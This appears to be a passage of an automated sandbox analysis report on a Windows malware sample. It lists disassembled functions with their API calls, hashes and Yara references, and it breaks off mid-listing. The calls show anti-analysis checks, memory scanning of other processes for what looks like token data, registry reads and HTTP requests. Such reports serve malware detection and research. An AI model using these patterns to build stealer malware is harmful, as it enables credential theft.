Function 00825527 Relevance: 9.1, APIs: 6, Instructions: 138stringCOMMON

Download Yara Rule

APIs

Part of subcall function 0082AA07: lstrcpy.KERNEL32(?,00000000), ref: 0082AA4D

Part of subcall function 008164E7: InternetOpenA.WININET(00420DFE,00000001,00000000,00000000,00000000), ref: 00816548
Part of subcall function 008164E7: StrCmpCA.SHLWAPI(?,0064A480), ref: 0081656A
Part of subcall function 008164E7: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0081659C
Part of subcall function 008164E7: HttpOpenRequestA.WININET(00000000,00421A28,?,0064A2B4,00000000,00000000,00400100,00000000), ref: 008165EC
Part of subcall function 008164E7: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00816626
Part of subcall function 008164E7: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00816638

Part of subcall function 0082AB07: lstrcpy.KERNEL32(?,00420E17), ref: 0082AB6C

StrCmpCA.SHLWAPI(00000000,0042109C,00000000), ref: 0082557F
lstrlen.KERNEL32(00000000), ref: 00825596

Part of subcall function 00829097: LocalAlloc.KERNEL32(00000040,-00000001), ref: 008290B9

StrStrA.SHLWAPI(00000000,00000000), ref: 008255CB
lstrlen.KERNEL32(00000000), ref: 008255EA
strtok.MSVCRT(00000000,?), ref: 00825605
lstrlen.KERNEL32(00000000), ref: 00825615

Part of subcall function 0082A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 0082A9EF

Memory Dump Source

Source File: 00000000.00000002.2241071861.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_uCEeVGAWIB.jbxd

Yara matches

Similarity

API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSendstrtok
String ID:
API String ID: 3532888709-0
Opcode ID: ea37f877b7fbbacf1c7384582398939b25ca2f08c2eb8411cf358fbfa571aba2
Instruction ID: 2ced5aa9cd6a0b88b2a93a41f80dde55aeae83a535193807eb28d359d4ec2c20
Opcode Fuzzy Hash: ea37f877b7fbbacf1c7384582398939b25ca2f08c2eb8411cf358fbfa571aba2
Instruction Fuzzy Hash: E351E874950228DBCF18EF68EE96AED7779FF20700F904018F906A6592DB346B85CB53

Function 00827337 Relevance: 9.1, APIs: 6, Instructions: 136COMMON

Download Yara Rule

APIs

??_U@YAPAXI@Z.MSVCRT(00064000), ref: 00827345

Part of subcall function 0082A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 0082A9EF

OpenProcess.KERNEL32(001FFFFF,00000000,00827574,004205BD), ref: 00827383
memset.MSVCRT ref: 008273D1
??_V@YAXPAX@Z.MSVCRT(?), ref: 00827525

Memory Dump Source

Source File: 00000000.00000002.2241071861.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_uCEeVGAWIB.jbxd

Yara matches

Similarity

API ID: OpenProcesslstrcpymemset
String ID:
API String ID: 224852652-0
Opcode ID: 1aeff6b0bc1cdda16161dcd1e0d48fd3adfd470a7707b0dabfde7a46d1ab6f7a
Instruction ID: 0b8a34b29b019a95d37ec8a5c1b4435608da56ecee404a5f349ed2bff9e1a2b1
Opcode Fuzzy Hash: 1aeff6b0bc1cdda16161dcd1e0d48fd3adfd470a7707b0dabfde7a46d1ab6f7a
Instruction Fuzzy Hash: 29516DB0D04228DBDB14EBA5ED85BEDB7B4FF44305F5040A9E205E6181DB746AC4CF59

Function 00824317 Relevance: 9.1, APIs: 6, Instructions: 124registrystringCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 0082433C
RegOpenKeyExA.ADVAPI32(80000001,0064A4D8,00000000,00020119,?), ref: 0082435B
RegQueryValueExA.ADVAPI32(?,0064A0D4,00000000,00000000,00000000,000000FF), ref: 0082437F
RegCloseKey.ADVAPI32(?), ref: 00824389
lstrcat.KERNEL32(?,00000000), ref: 008243AE
lstrcat.KERNEL32(?,0064A168), ref: 008243C2

Memory Dump Source

Source File: 00000000.00000002.2241071861.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_uCEeVGAWIB.jbxd

Yara matches

Similarity

API ID: lstrcat$CloseOpenQueryValuememset
String ID:
API String ID: 2623679115-0
Opcode ID: 5690b8b16156ff116e39c423b9c20f7378d9982cb7fd98343760b82f2f9cb978
Instruction ID: 3afa9334ddfe2cce6ebd2b4910120362e9d5187bb0c56cdbc8e6cb1d10a52aca
Opcode Fuzzy Hash: 5690b8b16156ff116e39c423b9c20f7378d9982cb7fd98343760b82f2f9cb978
Instruction Fuzzy Hash: FF41B4B6940108BBDB14EBE0EC4AFEE737DFF49300F005558B625961C1EA7556D88BE2

Function 004140B0 Relevance: 9.1, APIs: 6, Instructions: 124registrystringCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 004140D5
RegOpenKeyExA.ADVAPI32(80000001,008C9B00,00000000,00020119,?), ref: 004140F4
RegQueryValueExA.ADVAPI32(?,008C95C8,00000000,00000000,00000000,000000FF), ref: 00414118
RegCloseKey.ADVAPI32(?), ref: 00414122
lstrcatA.KERNEL32(?,00000000,?,00000104), ref: 00414147
lstrcatA.KERNEL32(?,008C9520), ref: 0041415B

Memory Dump Source

Source File: 00000000.00000002.2240797989.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2240797989.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uCEeVGAWIB.jbxd

Yara matches

Similarity

API ID: lstrcat$CloseOpenQueryValuememset
String ID:
API String ID: 2623679115-0
Opcode ID: bc2d94edd70f49bf8f62656b9ca3487d8b5429edb2de975fb07ca5a133c360a1
Instruction ID: 42b23dca6cf9d61fcd17bb79f48ce0988bb9dd5848c5c15250a36de7d2584b3c
Opcode Fuzzy Hash: bc2d94edd70f49bf8f62656b9ca3487d8b5429edb2de975fb07ca5a133c360a1
Instruction Fuzzy Hash: 6941B6BAD402087BDB14EBE0DC46FEE777DAB88304F00455DB61A571C1EA795B888B92

Function 00413560 Relevance: 9.1, APIs: 6, Instructions: 122stringCOMMON

Download Yara Rule

APIs

strtok_s.MSVCRT ref: 00413588

Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788

strtok_s.MSVCRT ref: 004136D1

Part of subcall function 0041A820: lstrlenA.KERNEL32(00000000,?,?,00415B54,00420ADB,00420ADA,?,?,00416B16,00000000,?,00899BA0,?,0042110C,?,00000000), ref: 0041A82B
Part of subcall function 0041A820: lstrcpy.KERNEL32(B,00000000), ref: 0041A885

Memory Dump Source

Source File: 00000000.00000002.2240797989.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2240797989.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uCEeVGAWIB.jbxd

Yara matches

Similarity

API ID: lstrcpystrtok_s$lstrlen
String ID:
API String ID: 3184129880-0
Opcode ID: 64ab5e27dc640e177239ea1b756d4cc1ada2d3f0f35c5ecd3cd97600b2ebe9e7
Instruction ID: 1d6e97e2126c91d023f3aa3275f065f217875d3b7f18f669bcfd2096c4fc0c60
Opcode Fuzzy Hash: 64ab5e27dc640e177239ea1b756d4cc1ada2d3f0f35c5ecd3cd97600b2ebe9e7
Instruction Fuzzy Hash: C34191B1D00108EFCB04EFE5D945AEEB7B4BF44308F00801EE41676291DB789A56CFAA

Function 0041B38C Relevance: 9.1, APIs: 6, Instructions: 98COMMONLIBRARYCODE

Download Yara Rule

APIs

__lock.LIBCMT ref: 0041B39A

Part of subcall function 0041AFAC: __mtinitlocknum.LIBCMT ref: 0041AFC2
Part of subcall function 0041AFAC: __amsg_exit.LIBCMT ref: 0041AFCE
Part of subcall function 0041AFAC: EnterCriticalSection.KERNEL32(?,?,?,0041AC60,0000000E,0042A0F0,0000000C,0041AC2A), ref: 0041AFD6

DecodePointer.KERNEL32(0042A130,00000020,0041B4DD,?,00000001,00000000,?,0041B4FF,000000FF,?,0041AFD3,00000011,?,?,0041AC60,0000000E), ref: 0041B3D6
DecodePointer.KERNEL32(?,0041B4FF,000000FF,?,0041AFD3,00000011,?,?,0041AC60,0000000E,0042A0F0,0000000C,0041AC2A), ref: 0041B3E7

Part of subcall function 0041BE35: EncodePointer.KERNEL32(00000000,0041C063,004495B8,00000314,00000000,?,?,?,?,?,0041B707,004495B8,Microsoft Visual C++ Runtime Library,00012010), ref: 0041BE37

DecodePointer.KERNEL32(-00000004,?,0041B4FF,000000FF,?,0041AFD3,00000011,?,?,0041AC60,0000000E,0042A0F0,0000000C,0041AC2A), ref: 0041B40D
DecodePointer.KERNEL32(?,0041B4FF,000000FF,?,0041AFD3,00000011,?,?,0041AC60,0000000E,0042A0F0,0000000C,0041AC2A), ref: 0041B420
DecodePointer.KERNEL32(?,0041B4FF,000000FF,?,0041AFD3,00000011,?,?,0041AC60,0000000E,0042A0F0,0000000C,0041AC2A), ref: 0041B42A

Memory Dump Source

Source File: 00000000.00000002.2240797989.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2240797989.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uCEeVGAWIB.jbxd

Yara matches

Similarity

API ID: Pointer$Decode$CriticalEncodeEnterSection__amsg_exit__lock__mtinitlocknum
String ID:
API String ID: 2005412495-0
Opcode ID: b7f77734ebbf3840f36807ba88357d63e713c7e7dec9936b016044a468d43742
Instruction ID: 63863d844e937e4da23c5f373c227dc8c5909fe93770eb0c6870133be37feb4a
Opcode Fuzzy Hash: b7f77734ebbf3840f36807ba88357d63e713c7e7dec9936b016044a468d43742
Instruction Fuzzy Hash: 05314874900309DFDF109FA9C9452DEBAF1FF48314F10802BE454A6262CBB94891DFAE

Function 00826C57 Relevance: 9.1, APIs: 6, Instructions: 89sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 00829AC7: GetProcAddress.KERNEL32(0064A8B0,0064A204), ref: 00829B08
Part of subcall function 00829AC7: GetProcAddress.KERNEL32(0064A8B0,0064A5C8), ref: 00829B21
Part of subcall function 00829AC7: GetProcAddress.KERNEL32(0064A8B0,0064A644), ref: 00829B39
Part of subcall function 00829AC7: GetProcAddress.KERNEL32(0064A8B0,0064A264), ref: 00829B51
Part of subcall function 00829AC7: GetProcAddress.KERNEL32(0064A8B0,0064A250), ref: 00829B6A
Part of subcall function 00829AC7: GetProcAddress.KERNEL32(0064A8B0,0064A2F8), ref: 00829B82
Part of subcall function 00829AC7: GetProcAddress.KERNEL32(0064A8B0,0064A4D4), ref: 00829B9A
Part of subcall function 00829AC7: GetProcAddress.KERNEL32(0064A8B0,0064A33C), ref: 00829BB3
Part of subcall function 00829AC7: GetProcAddress.KERNEL32(0064A8B0,0064A5A0), ref: 00829BCB
Part of subcall function 00829AC7: GetProcAddress.KERNEL32(0064A8B0,0064A548), ref: 00829BE3
Part of subcall function 00829AC7: GetProcAddress.KERNEL32(0064A8B0,0064A3BC), ref: 00829BFC
Part of subcall function 00829AC7: GetProcAddress.KERNEL32(0064A8B0,0064A2E8), ref: 00829C14
Part of subcall function 00829AC7: GetProcAddress.KERNEL32(0064A8B0,0064A60C), ref: 00829C2C
Part of subcall function 00829AC7: GetProcAddress.KERNEL32(0064A8B0,0064A0B0), ref: 00829C45

Part of subcall function 0082A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 0082A9EF

Part of subcall function 00811437: ExitProcess.KERNEL32 ref: 00811478

Part of subcall function 008113C7: GetSystemInfo.KERNEL32(?), ref: 008113D1
Part of subcall function 008113C7: ExitProcess.KERNEL32 ref: 008113E5

Part of subcall function 00811377: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00811392
Part of subcall function 00811377: VirtualAllocExNuma.KERNEL32(00000000), ref: 00811399
Part of subcall function 00811377: ExitProcess.KERNEL32 ref: 008113AA

Part of subcall function 00811487: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 008114A5
Part of subcall function 00811487: __aulldiv.LIBCMT ref: 008114BF
Part of subcall function 00811487: __aulldiv.LIBCMT ref: 008114CD
Part of subcall function 00811487: ExitProcess.KERNEL32 ref: 008114FB

Part of subcall function 008269D7: GetUserDefaultLangID.KERNEL32 ref: 008269DB

Part of subcall function 008113F7: ExitProcess.KERNEL32 ref: 0081142D

Part of subcall function 00827AB7: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,0081141E), ref: 00827AE7
Part of subcall function 00827AB7: RtlAllocateHeap.NTDLL(00000000), ref: 00827AEE
Part of subcall function 00827AB7: GetUserNameA.ADVAPI32(00000104,00000104), ref: 00827B06

Part of subcall function 00827B47: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00827B77
Part of subcall function 00827B47: RtlAllocateHeap.NTDLL(00000000), ref: 00827B7E
Part of subcall function 00827B47: GetComputerNameA.KERNEL32(?,00000104), ref: 00827B96

Part of subcall function 0082AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FB4,00420E17), ref: 0082AC2C
Part of subcall function 0082AC17: lstrcpy.KERNEL32(00000000), ref: 0082AC6B
Part of subcall function 0082AC17: lstrcat.KERNEL32(00000000,00000000), ref: 0082AC79

Part of subcall function 0082AB07: lstrcpy.KERNEL32(?,00420E17), ref: 0082AB6C

OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,0064A540,?,0042110C,?,00000000,?,00421110,?,00000000,00420AEF), ref: 00826D31
CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00826D4F
CloseHandle.KERNEL32(00000000), ref: 00826D60
Sleep.KERNEL32(00001770), ref: 00826D6B
CloseHandle.KERNEL32(?,00000000,?,0064A540,?,0042110C,?,00000000,?,00421110,?,00000000,00420AEF), ref: 00826D81
ExitProcess.KERNEL32 ref: 00826D89

Memory Dump Source

Source File: 00000000.00000002.2241071861.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_uCEeVGAWIB.jbxd

Yara matches

Similarity

API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser__aulldiv$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
String ID:
API String ID: 2525456742-0
Opcode ID: 8bfceb1ee71bfa1add3f5fc1feb3515e0baf2b6ad89577cb8e665fbf230e511d
Instruction ID: 28c57183d3abcd142ad30f2061e541842fa6332f06c6e3e432a47054ea6a0d80
Opcode Fuzzy Hash: 8bfceb1ee71bfa1add3f5fc1feb3515e0baf2b6ad89577cb8e665fbf230e511d
Instruction Fuzzy Hash: D3311875A40228ABDB08FBE8EC56AED7379FF14700F500529B112E6592EF745A84CA63

Function 00819C27 Relevance: 9.1, APIs: 6, Instructions: 82filememoryCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00819C53
GetFileSizeEx.KERNEL32(000000FF,?), ref: 00819C78
LocalAlloc.KERNEL32(00000040,?), ref: 00819C98
ReadFile.KERNEL32(000000FF,?,00000000,008116F6,00000000), ref: 00819CC1
LocalFree.KERNEL32(008116F6), ref: 00819CF7
CloseHandle.KERNEL32(000000FF), ref: 00819D01

Memory Dump Source

Source File: 00000000.00000002.2241071861.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_uCEeVGAWIB.jbxd

Yara matches

Similarity

API ID: File$Local$AllocCloseCreateFreeHandleReadSize
String ID:
API String ID: 2311089104-0
Opcode ID: c3da04e987efa8c3bc657412c5dcc3be7704e612d0e6c1399905993ce2b8bcb5
Instruction ID: da5c6069531e31b73b8b305cc690fd2705352f905b94365e60be3e71daf51efc
Opcode Fuzzy Hash: c3da04e987efa8c3bc657412c5dcc3be7704e612d0e6c1399905993ce2b8bcb5
Instruction Fuzzy Hash: 333109B8A00209EFDB14CF94D895BEE77F9FF49700F108158E955A7290C774AA81CFA1

Function 004099C0 Relevance: 9.1, APIs: 6, Instructions: 82filememoryCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004099EC
GetFileSizeEx.KERNEL32(000000FF,?), ref: 00409A11
LocalAlloc.KERNEL32(00000040,?), ref: 00409A31
ReadFile.KERNEL32(000000FF,?,00000000,004102E7,00000000), ref: 00409A5A
LocalFree.KERNEL32(004102E7), ref: 00409A90
CloseHandle.KERNEL32(000000FF), ref: 00409A9A

Memory Dump Source

Source File: 00000000.00000002.2240797989.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2240797989.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uCEeVGAWIB.jbxd

Yara matches

Similarity

API ID: File$Local$AllocCloseCreateFreeHandleReadSize
String ID:
API String ID: 2311089104-0
Opcode ID: 7104a1ad71f7267fb3f92d709a770ba7d5c34dd003ba373b3d6e6f2e7190c7f7
Instruction ID: ed52a4b53b9c0591db71eabf51b59360b39b3b260bb7ca760b64e801f0f9a50e
Opcode Fuzzy Hash: 7104a1ad71f7267fb3f92d709a770ba7d5c34dd003ba373b3d6e6f2e7190c7f7
Instruction Fuzzy Hash: 02310778A00209EFDB14CF94C985BAEB7B5FF49350F108169E901A7390D778AD41CFA5

Function 0082CC45 Relevance: 9.0, APIs: 6, Instructions: 47COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 0082CC51

Part of subcall function 0082C206: __getptd_noexit.LIBCMT ref: 0082C209
Part of subcall function 0082C206: __amsg_exit.LIBCMT ref: 0082C216

__amsg_exit.LIBCMT ref: 0082CC71
__lock.LIBCMT ref: 0082CC81
InterlockedDecrement.KERNEL32(?), ref: 0082CC9E
free.MSVCRT ref: 0082CCB1
InterlockedIncrement.KERNEL32(0042B980), ref: 0082CCC9

Memory Dump Source

Source File: 00000000.00000002.2241071861.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_uCEeVGAWIB.jbxd

Yara matches

Similarity

API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lockfree
String ID:
API String ID: 634100517-0
Opcode ID: 9842265763d25ebdd135a5071e54c4fa9195cc385294f2eefb115a4ad94e6967
Instruction ID: c7cab9cb1c5b96b136dc817eac57b2027e4f178f989d6897ed37dbbf97c9620d
Opcode Fuzzy Hash: 9842265763d25ebdd135a5071e54c4fa9195cc385294f2eefb115a4ad94e6967
Instruction Fuzzy Hash: 0F01C031A01B34EBCB21AB69B44577D77A0FF14720F504126EC18E7290CB3469C1DBDA

Function 0041C9DE Relevance: 9.0, APIs: 6, Instructions: 47COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 0041C9EA

Part of subcall function 0041BF9F: __getptd_noexit.LIBCMT ref: 0041BFA2
Part of subcall function 0041BF9F: __amsg_exit.LIBCMT ref: 0041BFAF

__amsg_exit.LIBCMT ref: 0041CA0A
__lock.LIBCMT ref: 0041CA1A
InterlockedDecrement.KERNEL32(?), ref: 0041CA37
free.MSVCRT ref: 0041CA4A
InterlockedIncrement.KERNEL32(0042B558), ref: 0041CA62

Memory Dump Source

Source File: 00000000.00000002.2240797989.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2240797989.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uCEeVGAWIB.jbxd

Yara matches

Similarity

API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lockfree
String ID:
API String ID: 634100517-0
Opcode ID: 9cc761a24a700c336990656e08babd42fdc3626541d12aa0f7b86557c35da351
Instruction ID: 63787520114d18ae3399c837c16bfac6c494309a1b2e91ce42418771fe72ad0a
Opcode Fuzzy Hash: 9cc761a24a700c336990656e08babd42fdc3626541d12aa0f7b86557c35da351
Instruction Fuzzy Hash: DD01C431A817299BC722EB669C857DE77A0BF04794F11811BE814A7390C73C69D2CBDD

Function 00827167 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 156stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 00827186
??_U@YAPAXI@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,00827401,00000000,00420BA8,00000000,00000000), ref: 008271B4

Part of subcall function 00826E37: strlen.MSVCRT ref: 00826E48
Part of subcall function 00826E37: strlen.MSVCRT ref: 00826E6C

VirtualQueryEx.KERNEL32(00827574,00000000,?,0000001C), ref: 008271F9
??_V@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00827401), ref: 0082731A

Part of subcall function 00827047: ReadProcessMemory.KERNEL32(00000000,00000000,?,?,00000000,00064000,00064000,00000000,00000004), ref: 0082705F

Strings

@, xrefs: 0082720D

Memory Dump Source

Source File: 00000000.00000002.2241071861.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_uCEeVGAWIB.jbxd

Yara matches

Similarity

API ID: strlen$MemoryProcessQueryReadVirtual
String ID: @
API String ID: 2950663791-2766056989
Opcode ID: 0d89010186691ec5492239175b82a1a91f8bc2a2393b87c9978cf9f8736f9be8
Instruction ID: 6ca31889fd4b74c47e68a85e81923f69ebe089a3c3bc020d2141d008fe0ce485
Opcode Fuzzy Hash: 0d89010186691ec5492239175b82a1a91f8bc2a2393b87c9978cf9f8736f9be8
Instruction Fuzzy Hash: 765104B1A0411AEBDB04CF99E981AEFB7B6FF88300F108119F915E7240D734AE51DBA5

Function 00416F00 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 156stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 00416F1F
??_U@YAPAXI@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,0041719A,00000000,65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30,00000000,00000000), ref: 00416F4D

Part of subcall function 00416BD0: strlen.MSVCRT ref: 00416BE1
Part of subcall function 00416BD0: strlen.MSVCRT ref: 00416C05

VirtualQueryEx.KERNEL32(?,00000000,?,0000001C), ref: 00416F92
??_V@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0041719A), ref: 004170B3

Part of subcall function 00416DE0: ReadProcessMemory.KERNEL32(00000000,00000000,?,?,00000000,00064000,00064000,00000000,00000004), ref: 00416DF8

Strings

@, xrefs: 00416FA6

Memory Dump Source

Source File: 00000000.00000002.2240797989.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2240797989.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uCEeVGAWIB.jbxd

Yara matches

Similarity

API ID: strlen$MemoryProcessQueryReadVirtual
String ID: @
API String ID: 2950663791-2766056989
Opcode ID: 0d89010186691ec5492239175b82a1a91f8bc2a2393b87c9978cf9f8736f9be8
Instruction ID: da6ee04ed372484ea639f8c5ae6d2cf8ded6d6947598eb42fecba3fc0a9bdd2e
Opcode Fuzzy Hash: 0d89010186691ec5492239175b82a1a91f8bc2a2393b87c9978cf9f8736f9be8
Instruction Fuzzy Hash: 27511CB5E041099BDB04CF98D981AEFBBB5FF88304F108559F919A7340D738EA51CBA5

Function 004069B0 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 155libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(00000000,?,?,?,?,?,00406E2A), ref: 00406A19

Strings

*n@, xrefs: 00406B28, 00406BB6, 00406BBB, 00406B65
*n@, xrefs: 004069BD, 004069C9, 004069DC, 004069E5, 00406A09, 00406A32, 00406A35, 00406AEF, 00406B01, 00406B0D, 00406B16, 00406B93, 00406B49, 00406A4A, 00406A6D, 00406A79, 00406AA1, 00406AD1, 00406AE3, 00406AAD, 00406ABA, 00406A56

Memory Dump Source

Source File: 00000000.00000002.2240797989.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2240797989.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uCEeVGAWIB.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID: *n@$*n@
API String ID: 1029625771-193229609
Opcode ID: bf609db6eed200fea4b15f7f51f4bbb31f3205db81936f2c349fbd39333cdc99
Instruction ID: a280f62563b1b8af23ece619f3fba2aedbd92eaccb2561d1aa32790852693925
Opcode Fuzzy Hash: bf609db6eed200fea4b15f7f51f4bbb31f3205db81936f2c349fbd39333cdc99
Instruction Fuzzy Hash: DA71C874A00119DFCB04CF48C484BEAB7B2FB88315F158179E80AAF391D739AA91CB95

Function 008249E7 Relevance: 8.9, APIs: 7, Instructions: 101stringCOMMON

Download Yara Rule

APIs

lstrcat.KERNEL32(?,0064A30C), ref: 00824A42

Part of subcall function 00829047: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00829072

lstrcat.KERNEL32(?,00000000), ref: 00824A68
lstrcat.KERNEL32(?,?), ref: 00824A87
lstrcat.KERNEL32(?,?), ref: 00824A9B
lstrcat.KERNEL32(?,0064A284), ref: 00824AAE
lstrcat.KERNEL32(?,?), ref: 00824AC2
lstrcat.KERNEL32(?,0064A2C8), ref: 00824AD6

Part of subcall function 0082A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 0082A9EF

Part of subcall function 00828FF7: GetFileAttributesA.KERNEL32(00000000,?,00811DBB,?,?,00425654,?,?,00420E1F), ref: 00829006

Part of subcall function 008247D7: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 008247E7
Part of subcall function 008247D7: RtlAllocateHeap.NTDLL(00000000), ref: 008247EE
Part of subcall function 008247D7: wsprintfA.USER32 ref: 0082480D
